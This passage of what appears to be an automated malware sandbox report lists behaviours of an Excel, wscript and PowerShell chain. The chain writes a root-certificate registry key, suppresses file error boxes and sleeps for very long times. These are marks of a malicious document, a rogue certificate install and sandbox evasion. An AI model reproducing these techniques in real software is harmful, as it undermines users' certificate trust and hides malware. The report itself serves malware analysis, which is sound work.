Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\3F728A35DE52B2C8994A4FB101A03B95E87B06C8 BlobJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\wscript.exe TID: 1056Thread sleep time: -60000s >= -30000sJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 1932Thread sleep time: -922337203685477s >= -30000sJump to behavior
Source: C:\Windows\System32\wscript.exe TID: 1168Thread sleep time: -360000s >= -30000sJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 1684Thread sleep time: -180000s >= -30000sJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 1868Thread sleep time: -922337203685477s >= -30000sJump to behavior
Source: C:\Windows\System32\wscript.exe TID: 980Thread sleep time: -60000s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2788Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
